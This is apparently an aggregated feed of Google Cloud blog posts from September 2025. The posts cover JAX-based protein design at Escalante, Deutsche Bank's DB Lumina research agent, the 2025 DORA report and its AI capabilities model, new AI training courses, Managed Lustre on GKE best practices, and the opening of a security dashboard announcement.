Google Cloud

2025 09 23

GCP – AI Innovators: How JAX on TPU is helping Escalante advance AI-driven protein design

As a Python library for accelerator-oriented array computation and program transformation, JAX is widely recognized for its power in training large-scale AI models. But its core design as a system for composable function transformations unlocks its potential in a much broader scientific landscape. Following our recent post on solving high-order partial differential equations, or PDEs, we’re excited to highlight another frontier where JAX is making a significant impact: AI-driven protein engineering.

I recently spoke with April Schleck and Nick Boyd, two co-founders of Escalante, a startup using AI to train models that predict the impact of drugs on cellular protein expression levels. Their story is a powerful illustration of how JAX’s fundamental design choices — especially its functional and composable nature — are enabling researchers to tackle multi-faceted scientific challenges in ways that are difficult to achieve with other frameworks.

A new approach to protein design

April and Nick explained that Escalante’s long-term vision is to train machine learning (ML) models that can design drugs from the ground up. Unlike fields like natural language processing, which benefit from vast amounts of public data, biology currently lacks the specific datasets needed to train models that truly understand cellular systems. Thus, their immediate focus is to solve this data problem by using current AI tools to build new kinds of lab assays that can generate these massive, relevant biological datasets.

This short-term mission puts them squarely in the field of protein engineering, which they described as a complex, multi-objective optimization problem. When designing a new protein, they aren’t just optimizing one thing; it needs to bind to a specific target, while also being soluble, thermostable, and expressible in bacteria. Each of these properties is predicted by a different ML model (see figure below), ranging from complex architectures like AlphaFold 2 (implemented in JAX) to simpler, custom-trained models. Their core challenge is to combine all these different objectives into a single optimization loop.

This is where, as April put it, “JAX became a game-changer for us.” She noted that while combining many AI models might be theoretically possible in other frameworks, JAX’s functional nature makes it incredibly natural to integrate a dozen different ones into a single loss function (see figure below).

Easily combine multiple objectives represented by different loss terms and models

In the above code, Nick explained that there are at least two different ways models are being combined — some loss terms that are being linearly combined (e.g. the AF loss + the ESM pseudo log likelihood loss), and some terms where models are being composed serially (e.g., in the first Boltz-1 term we first fold the sequence with Boltz-1 and then compute the sequence likelihood after inverse folding with another model, ProteinMPNN).

To make this work, they embraced the JAX ecosystem, even translating models from PyTorch themselves — a prime example being their JAX translation of the Boltz-2 structure prediction model.

This approach gives what April called an “expressive language for protein design,” where models can be composed, added, and transformed to define a final objective. April said that the most incredible part is that this entire, complex graph of models “can be wrapped in a single jax.jit call that gives great performance” — something they found very difficult to do in other frameworks.

Instead of a typical training run that optimizes a model’s weights, their workflow inverts the process to optimize the input itself, using a collection of fixed, pre-trained neural networks as a complex, multi-objective loss function. The approach is mechanically analogous to Google’s DeepDream. Just as DeepDream takes a fixed, pre-trained image classifier and uses gradient ascent to iteratively modify an input image’s pixels to maximize a chosen layer’s activation, Escalante’s method starts with a random protein sequence. This sequence is fed through a committee of “expert” models — each one a pre-trained scorer for a different desirable property, like binding affinity or stability. The outputs from all the models are combined into a single, differentiable objective functional. They then calculate a gradient of this final score with respect to the input sequence via backpropagation. An optimizer then uses this gradient to update the sequence, nudging it in a direction that better satisfies the collective requirements of all the models. This cycle repeats, evolving the random initial input into a novel, optimized protein sequence that the entire ensemble of models “believes” is ideal.

Nick said that the choice of JAX was critical for this process. Its ability to compile and automatically differentiate complex code makes it ideal for optimizing the sophisticated loss functions at the heart of their work with Escalante’s library of tools for their protein design work, Mosaic. Furthermore, the framework’s native integration with TPU hardware via the XLA compiler allowed them to easily scale these workloads.

Escalante is sampling many potential protein designs for solving a problem (by optimizing the loss function). Each sampling job might generate 1K – 50K potential designs, which are then ranked and filtered. By the end of the process, they test only about 10 designs in the wet lab. This has led them to adopt a unique infrastructure pattern. Using Google Kubernetes Engine) (GKE), they instantly spin up 2,000 to 4,000 spot TPUs, run their optimization jobs for about half an hour, and then shut them all down.

Nick also shared the compelling economics driving this choice. Given current spot pricing, adopting Cloud TPU v6e (Trillium) over an H100 GPU translated to a gain of 3.65x in performance per dollar for their large-scale jobs. He stressed that this cost-effectiveness is critical for their long-term goal of designing protein binders against the entire human proteome, a task that requires immense computational scale.

To build their system, they rely on key libraries within the JAX ecosystem like Equinox and Optax. Nick prefers Equinox because it feels like “vanilla JAX,” calling its concept of representing a model as a simple PyTree “beautiful and easy to reason about.” Optax, meanwhile, gives them the flexibility to easily swap in different optimization algorithms for their design loops.

They emphasized that this entire stack — JAX’s functional core, its powerful ecosystem libraries, and the scalable TPU hardware — is what makes their research possible.

Explore the JAX scientific computing ecosystem

Stories like this are part of a vibrant new ecosystem in computational biology, one spawned in major part by the Nobel Prize-winning work on AlphaFold from Google DeepMind’s Demis Hassabis and John Jumper. Escalante’s work is a powerful example of how the foundational ideas of predicting protein structure are now being used to actively design new ones.

We are excited to see community contributions like Escalante’s Mosaic library, which contains the tools for their protein design work and is now available on GitHub. It’s a fantastic addition to the landscape of JAX-native scientific tools.

Stories like this highlight a growing trend: JAX is much more than a framework for deep learning. Its powerful system of program transformations, like grad and jit, makes it a foundational library for the paradigm of differentiable programming, empowering a new generation of scientific discovery. The JAX team at Google is committed to supporting and growing this vibrant ecosystem, and that starts with hearing directly from you.

Share your story: Are you using JAX to tackle a challenging problem?
Help guide our roadmap: Are there new features or capabilities that would unlock your next breakthrough?

Your feature requests are essential for guiding the evolution of JAX. Please reach out to the team to share your work or discuss what you need from JAX via GitHub.

Our sincere thanks to April and Nick for sharing their insightful journey with us. We’re excited to see how they and other researchers continue to leverage JAX to solve the world’s most complex scientific problems.

Read More for the details.

2025 09 23

GCP – Deutsche Bank delivers AI-powered financial research with DB Lumina

Tibor Kiss Cloud, Google Cloud gcp

At Deutsche Bank Research, the core mission of our analysts is delivering original, independent economic and financial analysis. However, creating research reports and notes relies heavily on a foundation of painstaking manual work. Or at least that was the case until generative AI came along.

Historically, analysts would sift through and gather data from financial statements, regulatory filings, and industry reports. Then, the true challenge begins — synthesizing this vast amount of information to uncover insights and findings. To do this, they have to build financial models, identify patterns and trends, and draw connections between diverse sources, past research, and the broader global context.

As analysts need to work as quickly as possible to bring valuable insights to market, this time-consuming process can limit the depth of analysis and the range of topics they can cover.

Our goal was to enhance the research analyst experience and reduce the reliance on manual processes and outsourcing. We created DB Lumina — an AI-powered research agent that helps automate data analysis, streamline workflows, and deliver more accurate and timely insights – all while maintaining the stringent data privacy requirements for the highly regulated financial sector.

“The adoption of the DB Lumina digital assistant by hundreds of research analysts is the culmination of more than 12 months of intense collaboration between dbResearch, our internal development team, and many others. This is just the start of our journey, and we are looking forward to building on this foundation as we continue to push the boundaries of how we responsibly use AI in research production to unlock exciting new innovations across our expansive coverage areas.” – Pam Finelli, Global COO for Investment Research at Deutsche Bank

Creating AI-powered research experiences

DB Lumina has three key features that transform the research experience for analysts and enhance productivity through advanced technologies.

1. Gen AI-powered chat

DB Lumina’s core conversational interface enables analysts to interact with Google’s state-of-the-art AI foundation models , including the multimodal Gemini models. They can ask questions, brainstorm ideas, refine writing, and even generate content in real time. Additionally, the chat capability supports uploading and querying documents conversationally, leveraging prior chat history to revisit and continue previous sessions. DB Lumina can help with tasks like summarization, proofreading, translation, and content drafting with precision and speed. In addition, we implemented guardrailing techniques to ensure the generation of compliant and reliable outputs.

2. Prompt templates

Prompt Templates offer pre-configured instructions tailored for document processing with consistent, high-quality outcomes. These templates enable analysts to facilitate the summarization of large documents, extraction of key data points, and the creation of reusable workflows for repetitive tasks. They can be customized for specific roles or business needs, and standardized across teams. Analysts can also save and share templates, ensuring more streamlined operations and enhanced collaboration. This functionality is made possible by Google’s long context window combined with advanced prompting techniques, which also provide citations for verification.

3. Knowledge

DB Lumina integrates a Retrieval-Augmented Generation (RAG) architecture that grounds responses in enterprise knowledge sources, such as internal research, external unstructured data (such as SEC filings), and other document repositories. The agent enhances transparency and accuracy by providing inline citations and source viewers for fact-checking. It also implements controlled access to confidential data with audit logging and explainability features, ensuring secure and trustworthy operations. Using advanced RAG architecture, supported by Google Cloud technologies, enables us to bring generative capabilities to enterprise knowledge resources to give analysts access to the latest, most relevant information when creating research reports and notes.

DB Lumina architecture

DB Lumina was designed to enhance Deutsche Bank Research’s productivity by enabling document ingestion, content summarization, Q&A, and editing.

Built on Google Cloud, the architecture leverages the following services:

Google Kubernetes Engine (GKE) for microservice orchestration
Cloud SQL with the pgvector extension for vector support
Cloud Storage for managing and storing unstructured data
Dataflow for document ingestion and embedding
Vertex AI for powering multimodal AI capabilities with Gemini
Discovery Engine API to enable RAG
Cloud Natural Language APIs for text and content moderation

All of DB Lumina’s AI capabilities are implemented with guardrails to ensure safe and compliant interactions. We also handle logging and monitoring with Google Cloud’s Observability suite, with prompt interactions stored in Cloud Storage and queried through BigQuery. To manage authentication, we use Identity as a Service integrated with Azure AD, and centralize authorization through dbEntitlements.

RAG and document ingestion

When DB Lumina processes and indexes documents, it splits them into chunks and creates embeddings using APIs like Gemini Embeddings API. It then stores these embeddings in a vector database like Vertex AI Vector Search or the pgvector extension on Cloud SQL. Raw text chunks are stored separately, for example, in Datastore or Cloud Storage.

These diagrams below show the typical RAG and ingestion patterns:

When an analyst submits a query, the system then routes it through a query engine. A Python application leverages an LLM API (Gemini 2.0 and 2.5) and retrieves relevant document snippets based on the query, providing context that is then used by the model to generate a relevant response. The sources indicate experimentation with different retrievers, including one using the pgvector extension on Cloud SQL for PostgreSQL, and one based on Vertex AI Search.

User interface

Using sliders in DB Lumina’s interface, users can easily adjust various parameters for summarization, including verbosity, data density, factuality, structure, reader perspective, flow, and individuality. The interface also includes functionality for providing feedback on summaries.

An evaluation framework for gen AI

Evaluating gen AI applications and agents like DB Lumina requires a custom framework due to the complexity and variability of model outputs. Traditional metrics and generic benchmarks often fail to capture the needs for gen AI features, the nuanced expectations of domain-specific users, and the operational constraints of enterprise environments. This necessitates a new set of gen AI metrics to accurately measure performance.

The DB Lumina evaluation framework employs a rich and extensible set of both industry-standard and custom-developed metrics, which are mapped to defined categories and documented in a central metric dictionary to ensure consistency across teams and features. Standard metrics like accuracy, completeness, and latency are foundational, but they are augmented with custom metrics, such as citation precision and recall, false rejection rates, and verbosity control — each tailored to the specific demands and regulatory requirements of financial research and document-grounded generation. Popular frameworks like Ragas also provide a solid foundation for assessing how well our RAG system grounds its responses in retrieved documents and avoids hallucinations.

In addition, test datasets are carefully curated to reflect a wide range of real-world scenarios, edge cases, and potential biases across DB Lumina’s core features like chat, document Q&A, templates, and RAG-based knowledge retrieval. These datasets are version-controlled and regularly updated to maintain relevance as the tool evolves. Their purpose is to provide a stable benchmark for evaluating model behavior under controlled conditions, enabling consistent comparisons across optimization cycles.

Evaluation is both quantitative and qualitative, combining automated scoring with human review for aspects like tone, structure, and content fidelity. Importantly, the framework ensures each feature is assessed for correctness, usability, efficiency, and compliance while enabling the rapid feedback and robust risk management needed to support iterative optimization and ongoing performance monitoring. We compare current metric outputs against historical baselines, leveraging stable test sets, Git hash tracking, and automated metric pipelines to support proactive interventions to ensure that performance deviations are caught early and addressed before they impact users or compliance standards.

This layered approach ensures that DB Lumina is not only accurate and efficient but also aligned with Deutsche Bank’s internal standards, achieving a balanced and rigorous evaluation strategy that supports both innovation and accountability.

Bringing new benefits to the business

We developed an initial pilot for DB Lumina with Google Cloud Consulting, creating a simple prototype early in the use case development that used only embeddings without prompts. Though it was later surpassed by later versions, this pilot informed the subsequent development of DB Lumina’s RAG architecture.

The project transitioned then through our development and application testing environments to our production deployment, eventually going live in September 2024. Currently, DB Lumina is already in the hands of around 5,000 users across Deutsche Bank Research, specifically in divisions like Investment Bank Origination & Advisory and Fixed Income & Currencies. We plan to roll it out to more than 10,000 users across corporate banking and other functions by the end of the year.

DBLumina is expected to deliver significant business benefits for Deutsche Bank:

Time savings: Analysts reported significant time savings, saving 30 to 45 minutes on preparing earnings note templates and up to two hours when writing research reports and roadshow updates.
Increased analysis depth: One analyst increased the analysis in an earnings report by 50%, adding additions sections by region and activity, as well as a summary section for forecast changes. This was achieved through summarization of earnings releases and investor transcripts and subsequent analysis through conversational prompts.
New analysis opportunities: DB Lumina has created new opportunities for teams to analyze new topics. For example, the U.S. and European Economics teams use DB Lumina to score central bank communications to assess hawkishness and dovishness over time. Another analyst was able to analyze and compare budget speeches from eight different ministries, tallying up keywords related to capacity constraints and growth orientation to identify shifts in priorities.
Increased accuracy: Analysts have also started using DB Lumina as part of their editing process. One supervisory analyst noted that since the rollout, there has been a noted improvement in the editorial and grammatical accuracy across analyst notes, especially from non-native English speakers.

Building the future of gen AI and RAG in finance

We’ve seen the power of RAG transform how financial institutions interact with their data. DB Lumina has proved the value of combining retrieval, gen AI, and conversational AI, but this is just the start of our journey. We believe the future lies in embracing and refining the “agentic” capabilities that are inherent in our architecture. We envision building and orchestrating a system where various components act as agents — all working together to provide intelligent and informed responses to complex financial inquiries.

To support our vision moving forward, we plan to deepen agent specialization within our RAG framework, building agents designed to handle specific types of queries or tasks across compliance, investment strategies, and risk assessment. We also want to incorporate the ReAct (Reasoning and Acting) paradigm into our agents’ decision-making process to enable them to not only retrieve information but also actively reason, plan actions, and refine their searches to provide more accurate and nuanced answers.

In addition, we’ll be actively exploring and implementing more of the tools and services available within Vertex AI to further enhance our AI capabilities. This includes exploring other models for specific tasks or to achieve different performance characteristics, optimizing our vector search infrastructure, and utilizing AI pipelines for greater efficiency and scalability across our RAG system.The ultimate goal is to empower DB Lumina to handle increasingly complex and multi-faceted queries through improved context understanding, ensuring it can accurately interpret context like previous interactions and underlying financial concepts. This includes moving beyond simple question answers to providing analysis and recommendations based on retrieved information. To enhance DB Lumina’s ability to provide real-time information and address queries requiring up-to-date external data, we are planning to integrate a feature for grounding responses with internet-based information.

By focusing on these areas, we aim to transform DB Lumina from a helpful information retriever into a powerful AI agent capable of tackling even the most challenging financial inquiries. This will unlock new opportunities for improved customer service, enhanced decision-making, and greater operational efficiency for financial institutions. The future of RAG and gen AI in finance is bright, and we’re excited to be at the forefront of this transformative technology.

Read More for the details.

2025 09 23

GCP – Announcing the 2025 DORA Report: State of AI-Assisted Software Development

Tibor Kiss Cloud, Google Cloud gcp

Today, we are excited to announce the 2025 DORA Report: State of AI-assisted Software Development. Drawing on insights from over 100 hours of qualitative data and survey responses from nearly 5,000 technology professionals from around the world.

The report reveals a key insight: AI doesn’t fix a team; it amplifies what’s already there. Strong teams use AI to become even better and more efficient. Struggling teams will find that AI only highlights and intensifies their existing problems. The greatest return comes not from the AI tools themselves, but from a strategic focus on the quality of internal platforms, the clarity of workflows, and the alignment of teams.

AI, the great amplifier

As we established from the 2024 report as well as the special report published this year called “Impact of Generative AI in Software Development”, organizations are continuing to heavily adopt AI and receive substantial benefits across important outcomes. And there is evidence of learning to better integrate these tools into our workflow. Unlike last year, we observe a positive relationship between AI adoption on both software delivery throughput and product performance. It appears that people, teams, and tools are learning where, when, and how AI is most useful. However, AI adoption does continue to have a negative relationship with software delivery stability.

This confirms our central theory – AI accelerates software development, but that acceleration can expose weaknesses downstream. Without robust control systems, like strong automated testing, mature version control practices, and fast feedback loops, an increase in change volume leads to instability. Teams working in loosely coupled architectures with fast feedback loops see gains, while those constrained by tightly coupled systems and slow processes see little or no benefit.

Key findings from the 2025 report

Beyond this central theme, this year’s research highlighted the following about modern software development:

AI adoption is near-universal: 90% of survey respondents report using AI at work. More than 80% believe it has increased their productivity. However, skepticism remains as 30% report little or no trust in the code generated by AI, a slightly lower percentage than last year but a key trend to note.
User-centricity is a prerequisite for AI success: AI becomes most useful when it’s pointed at a clear problem, and a user-centric focus provides that essential direction. Our data shows this focus amplifies AI’s positive influence on team performance.
Platform engineering is the foundation: Our data shows that 90% of organizations have adopted at least one platform and there is a direct correlation between a high quality internal platform and an organization’s ability to unlock the value of AI, making it an essential foundation for success.

The seven team archetypes

Simple software delivery metrics alone aren’t sufficient. They tell you what is happening but not why it’s happening. To connect performance data to experience, we conducted a cluster analysis that reveals seven common team profiles or archetypes, each with a unique interplay of performance, stability, and well-being. This model provides leaders with a way to diagnose team health and apply the right interventions.

The ‘Foundational challenges’ group are trapped in survival mode and face significant gaps in their processes and environment, leading to low performance, high system stability, and high levels of burnout and friction. While the ‘Harmonious high achievers’ excel across multiple areas, showing positive metrics for team well-being, product outcomes, and software delivery.

Read more details of each archetype in the “Understanding your software delivery performance: A look at seven team profiles” chapter of the report.

Unlocking the value of AI with the ‘DORA AI Capabilities Model’

This year, we went beyond identifying AI’s impact to investigating the conditions in which AI-assisted technology-professionals realize the best outcomes. The value of AI is unlocked not by the tools themselves, but by the surrounding technical practices and cultural environment.

Our research identified seven capabilities that are shown to magnify the positive impact of AI in organizations.

Where leaders should get started

One of the key insights derived from the research this year is that the value of AI will be unlocked by reimagining the system of work it inhabits. Technology leaders should treat AI adoption as an organizational transformation.

Here’s where we suggest you begin:

Clarify and socialize your AI policies
Connect AI to your internal context
Prioritize foundational practices
Fortify your safety nets
Invest in your internal platform
Focus on your end-users

The DORA research program is committed to serving as a compass to teams and organizations as we navigate the important and transformative period with AI. We hope the new team profiles and the DORA AI capabilities model provide a clear roadmap for you to move beyond simply adopting AI to unlocking its value by investing in teams and people. We look forward to learning how you put these insights into practice. To learn more:

Download the full report
Join the DORA community
Share this overview with your colleagues

Read More for the details.

2025 09 22

GCP – Introducing the DORA AI Capabilities Model: 7 keys to succeeding in AI-assisted software development

Tibor Kiss Cloud, Google Cloud gcp

Artificial intelligence is rapidly transforming software development. But simply adopting AI tools isn’t a guarantee of success. Across the industry, tech leaders and developers are asking the same critical questions: How do we move from just using AI to truly succeeding with it? How do we ensure our investment in AI delivers better, faster, and more reliable software?

The DORA research team has developed the inaugural DORA AI Capabilities Model to provide data-backed guidance for organizations grappling with these questions. This is not just another report on AI adoption trends; it is a guide to the specific technical and cultural practices that amplify the benefits of AI.

The DORA AI Capabilities Model: 7 levers of success

We developed the DORA AI Capabilities Model through a three-phase process. First, we identified and prioritized a wide-range of candidate capabilities based on 78 in-depth interviews, existing literature, and perspectives from leading subject-matter experts. Second, we developed and validated survey questions to ensure they were clear, reliable, and measured each capability accurately. Lastly, we evaluated the impact of a subset of these candidates using the rigorous methodology of designing and analyzing our annual survey—which reached almost 5,000 respondents. The analysis identified seven capabilities that substantially either amplify or unlock the benefits of AI:

Clear and communicated AI stance: Your organization’s position on AI-assisted tools must be clear and well-communicated.This includes clarity on expectations for AI use, support for experimentation, and which tools are permitted. Our research indicates that a clear AI stance amplifies AI’s positive impact on individual effectiveness and organizational performance, and can reduce friction for employees. Importantly, this capability does not measure the specific content of AI use policies, meaning organizations can achieve this capability regardless of their unique stance—as long as that stance is clear and communicated.
Healthy data ecosystems: The quality of your internal data is critical to AI success. A healthy data ecosystem, characterized by high-quality, easily accessible, and unified internal data, substantially amplifies the positive influence of AI adoption on organizational performance.
AI-accessible internal data: Connecting AI tools to internal data sources boosts their impact on individual effectiveness and code quality.Providing AI with company-specific context allows it to move beyond a general-purpose assistant into a highly specialized and valuable tool for your developers.
Strong version control practices: With the increased volume and velocity of code generation from AI, strong version control practices are more crucial than ever. Our research shows a powerful connection between mature version control habits and AI adoption. Specifically, frequent commits amplify AI’s positive influence on individual effectiveness, while the frequent use of rollback features boosts the performance of AI-assisted teams.
Working in small batches: Working in small batches, a long-standing DORA principle, is especially powerful in an AI-assisted environment.This practice amplifies the positive influence of AI on product performance and reduces friction for development teams.
User-centric focus: A deep focus on the end-user’s experience is paramount for teams utilizing AI. Our findings show that a user-centric focus amplifies the positive influence of AI on team performance. Importantly, we also found that in the absence of a user-centric focus, AI adoption can have a negative impact on team performance. When users are at the center of strategy, AI can help propel teams in the right direction. But, when users aren’t the focus, AI-assisted development teams may just be moving quickly in the wrong direction.
Quality internal platforms: Quality internal platforms provide the shared capabilities needed to scale the benefits of AI across an organization.In organizations with quality internal platforms, AI’s positive influence on organizational performance is amplified.

Putting the DORA AI Capabilities Model into practice

To successfully leverage AI in software development, it’s not enough to simply adopt new tools. Organizations must foster the right technical and cultural environment for AI-assisted developers to thrive. Based on our seven inaugural DORA AI Capabilities we recommend that organizations seeking to maximize the benefits of their AI adoption:

Clarify and socialize your AI policies: Ambiguity about what is acceptable stifles adoption and creates risk. Establish and clearly communicate your policy on permitted AI tools and usage to build developer trust and provide the psychological safety needed for effective experimentation.
Treat your data as a strategic asset: The benefits of AI on organizational performance are significantly amplified by a healthy data ecosystem. Invest in the quality, accessibility, and unification of your internal data sources.
Connect AI to your internal context: Move beyond generic AI assistance by investing the engineering effort to give your AI tools secure access to internal documentation, codebases, and other data sources. This provides the necessary company-specific context for maximal effectiveness.
Double-down on known best practices, like working in manageable increments: Enforce the discipline of working in small batches to improve product performance and reduce friction for AI-assisted teams.
Prioritize user-centricity: AI-assisted development tools can help developers produce, debug, and review code more quickly. But, if the core product strategy doesn’t center the needs of the end-user, then more code won’t mean more value to the organization. Explicitly centering user needs is a North Star for orienting AI-assisted teams toward the realization of a shared goal.
Embrace and fortify your safety nets: As AI increases the velocity of changes, your version control system becomes a critical safety net. Encourage teams to become highly proficient in using rollback and revert features.
Invest in your internal platform: A quality internal platform provides the necessary guardrails and shared capabilities that allow the benefits of AI to scale effectively and securely across your organization.

DORA’s research has long held that even the best tools and teams can’t succeed without the right organizational conditions. The findings of our inaugural DORA AI Capabilities Model are a reminder of this fact and suggest that successful AI-assisted development isn’t just a purchasing decision; it’s a decision to cultivate the conditions where AI-assisted developers thrive. Investing in these seven capabilities is an important step toward creating an environment where AI-assisted software development succeeds, leading to enhanced outcomes for your developers, your products, and your entire organization.

To explore the DORA AI Capabilities Model in more detail and to access our full 2025 DORA State of AI-Assisted Software Development, please visit the DORA website.

Read More for the details.

2025 09 19

GCP – Back to AI school: New Google Cloud training to future-proof your AI skills

Tibor Kiss Cloud, Google Cloud gcp

Getting ahead — and staying ahead — of the demand for AI skills isn’t just key for those looking for a new role. Research shows proving your skills through credentials drives promotion, salary increase, leadership opportunities and more. And 8 in 10 Google Cloud learners feel our training helps them stay ahead in the age of AI.¹ This is why we are so focused on providing new AI training content ensuring you have the tools to keep up in this ever-evolving space.

That’s why I’m thrilled to announce a new suite of Google Cloud AI training courses. These courses are designed with intermediate and advanced technical learners in mind for roles such as Cloud Infrastructure Engineers, Cloud Architects, AI Engineers and MLOps Engineers, AI Developers and Data Scientists. Whether you’re looking to build and manage powerful AI infrastructure, master the art of fine-tuning generative AI models, leverage serverless AI inference, or secure your AI deployments, we’ve got you covered.

For cloud infrastructure engineers, cloud architects, AI engineers and MLOps engineers:

AI infrastructure mini courses are your guide to designing, deploying and managing the high-performance infrastructure that powers modern AI. You’ll gain a deep understanding of Google’s TPU and GPU platforms, and learn to use Google Compute Engine (GCE) and Google Kubernetes Engine (GKE) as a robust foundation for any AI workload you can imagine.

For machine learning engineers, data scientists and AI developers:

Build AI Agents with Databases on Google Cloud teaches you how to securely connect AI agents to your existing enterprise databases. You’ll learn to craft agents that perform intelligent querying and semantic search, design and implement advanced multi-step workflows, and deploy and operationalize these powerful AI applications. This course is essential for building robust and reliable AI agents that can leverage your most critical data.
Supervised fine-tuning for Gemini educates you on how to take Google’s powerful models and make them your own by customizing them for your specific tasks, enhancing their quality and efficiency so they deliver precisely what you and your users need.
Cloud Run for AI Inference teaches you how to deploy those innovations with incredible speed and scale of serverless AI workloads. You’ll learn how to handle demanding AI workloads, including lightweight LLMs, and leverage GPU acceleration, ensuring your creations reach your audience efficiently and reliably.

Security engineers, security analysts:

Model Armor: Securing AI Deployments equips you with the knowledge to protect your generative AI applications from critical risks like data leakage and prompt injection. It’s the essential step to ensuring your innovations can be leveraged with confidence.

For individual developers, business analysts, and other non-technical users:

Develop AI-Powered Prototypes in Google AI Studio shows you how to use Google AI Studio, our developer playground for the Gemini API, to quickly sketch and test your ideas. Through hands-on labs and tutorials, you’ll learn how to prototype apps with little upfront setup and create custom models without needing extensive coding expertise. It’s the perfect way to turn a concept into a working model, ensuring your final structure is built on a tested and innovative design.

Start learning

Building a career in AI is about creating a future where you feel empowered and prepared, no matter how the landscape changes. We believe these courses provide the tools and the confidence to do just that.

Explore our new AI courses on Google Cloud Skills Boost today, and start building for your future.

^{1. Google/Ipsos, Cloud Learning Services Market Pulse, Fielded Sept 17th – October 23rd 2024 (US, UK, FR, DE, IN, BR, MX, JP, AU/NZ)}

Read More for the details.

2025 09 19

GCP – 5 best practices for Managed Lustre on Google Kubernetes Engine

Tibor Kiss Cloud, Google Cloud gcp

Google Kubernetes Engine (GKE) is a powerful platform for orchestrating scalable AI and high-performance computing (HPC) workloads. But as clusters grow and jobs become more data-intensive, storage I/O can become a bottleneck. Your powerful GPUs and TPUs can end up idle, while waiting for data, driving up costs and slowing down innovation.

Google Cloud Managed Lustre is designed to solve this problem. Many on-premises HPC environments already use parallel file systems, and Managed Lustre makes it easier to bring those workloads to the cloud. With its managed Container Storage Interface (CSI) driver, Managed Lustre and GKE operations are fully integrated.

Optimizing your move to a high-performance parallel file system can help you get the most out of your investment from day one.

Before deploying, it’s helpful to know when to use Managed Lustre versus other options like Google Cloud Storage. For most AI and ML workloads, Managed Lustre is the recommended solution. It excels in training and checkpointing scenarios that require very low latency (less than a millisecond) and high throughput for small files, which keeps your expensive accelerators fully utilized. For data archiving or workloads with large files (over 50 MB) that can tolerate higher latency, Cloud Storage FUSE with Anywhere Cache can be another choice.

Based on our work with early customers and the learnings from our teams, here are five best practices to ensure you get the most out of Managed Lustre on GKE.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x7f48cffec4c0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

1. Design for data locality

For performance-sensitive applications, you want your compute resources and storage to be as close as possible, ideally within the same zone in a given region. When provisioning volumes dynamically, the volumeBindingMode parameter in your StorageClass is your most important tool. We strongly recommend setting it to WaitForFirstConsumer. GKE provides a built-in StorageClass for Managed Lustre that uses WaitForFirstConsumer binding mode by default.

Generated yaml:

code_block: <ListValue: [StructValue([(‘code’, ‘apiVersion: storage.k8s.io/v1rnkind: StorageClassrnmetadata:rn name: lustre-regional-waitrnprovisioner: lustre.csi.storage.gke.iornvolumeBindingMode: WaitForFirstConsumerrn…’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f48d23d3160>)])]>

Why it’s a best practice: Using WaitForFirstConsumer instructs GKE to delay the provisioning of the Lustre instance until a pod that needs it is scheduled. The scheduler then uses the pod’s topology constraints (i.e., the zone it’s scheduled in) to create the Lustre instance in that exact same zone. This guarantees co-location of your storage and compute, minimizing network latency.

2. Right-size your performance with tiers

Not all high-performance workloads are the same. Managed Lustre offers multiple performance tiers (read and write throughput in MB/s per TiB of storage) so you can align cost directly with your performance requirements.

1000 & 500 MB/s/TiB: Ideal for throughput-critical workloads like foundation model training or large-scale physics simulations where I/O bandwidth is the primary bottleneck.
250 MB/s/TiB: A balanced, cost-effective tier great for many general HPC workloads and AI inference serving, and data-heavy analytics pipelines.
125 MB/s/TiB: Best for large-capacity use cases where having a massive, POSIX-compliant file system is more important than achieving peak throughput. This is also useful for migrating on-premises containerized applications without modification, making it easier to migrate on-premises workloads to the cloud storage.

Why it’s a best practice: Defaulting to the highest tier isn’t always the most cost-effective strategy. By analyzing your workload’s I/O profile, you can significantly optimize your total cost of ownership.

3. Master your networking foundation

A parallel file system is a network-attached resource. Getting the networking right up front will save you days of troubleshooting. Before provisioning, ensure your VPC is correctly configured by following the setup steps in our documentation. This involves three key steps detailed in our documentation:

Enable Service Networking.
Create an IP range for VPC peering.
Create a firewall rule to allow traffic from that range on the Lustre network port (TCP 988 or 6988).

Why it’s a best practice: This is a one-time setup per VPC that establishes the secure peering connection that allows your GKE nodes to communicate with the Managed Lustre service.

4. Use dynamic provisioning for simplicity, static for long-lived shared data

The Managed Lustre CSI driver supports two modes for connecting storage to your GKE workloads.

Dynamic provisioning: Use when your storage is tightly coupled to the lifecycle of a specific workload or application. By defining a StorageClass and PersistentVolumeClaim (PVC), GKE will automatically manage the Lustre instance lifecycle for you. This is the simplest, most automated approach.
Static provisioning: Use when you have a long-lived Lustre instance that needs to be shared across multiple GKE clusters and jobs. You create the Lustre instance once, then create a PersistentVolume (PV) and PVC in your cluster to mount it. This decouples the storage lifecycle from any single workload.

Why it’s a best practice: Thinking about your data’s lifecycle helps you choose the right pattern. Use dynamic provisioning as your default because of simplicity, and opt for static provisioning when you need to treat your file system as a persistent, shared resource across your organization.

5. Architecting for parallelism with Kubernetes Jobs

Many AI and HPC tasks, like data preprocessing or batch inference, are suited for parallel execution. Instead of running a single, large pod, use the Kubernetes Job resource to divide the work across many smaller pods.

Consider this pattern:

Create a single PersistentVolumeClaim for your Managed Lustre instance, making it available to your cluster.
Define a Kubernetes job with parallelism set to a high number (e.g., 100).
Each pod created by the Job mounts the same Lustre PVC.
Design your application so that each pod works on a different subset of the data (e.g., processing a different range of files or data chunks).

Why it’s a best practice: In this pattern, you create a single PVC for your Lustre instance and have each pod created by the Job mount that same PVC. By designing your application so that each pod works on a different subset of the data, you turn your GKE cluster into a powerful, distributed data processing engine. The GKE Job controller acts as the parallel task orchestrator, while Managed Lustre serves as the high-speed data backbone, allowing you to achieve massive aggregate throughput.

Get started today

By combining the orchestration power of GKE with the performance of Managed Lustre, you can build a truly scalable and efficient platform for AI and HPC. Following these best practices will help you create a solution that is not only powerful, but also efficient, cost-effective, and easy to manage.

Ready to get started? Explore the Managed Lustre documentation, and provision your first instance today.

Read More for the details.

2025 09 19

GCP – Strengthen GCE and GKE security with new dashboards powered by Security Command Center

Tibor Kiss Cloud, Google Cloud gcp

As cloud infrastructure evolves, so should how you safeguard that technology. As part of our efforts to help you maintain a strong security posture, we’ve introduced powerful capabilities that can address some of the thorniest challenges faced by IT teams who work with Google Compute Engine (GCE) virtual machines and Google Kubernetes Engine (GKE) containers.

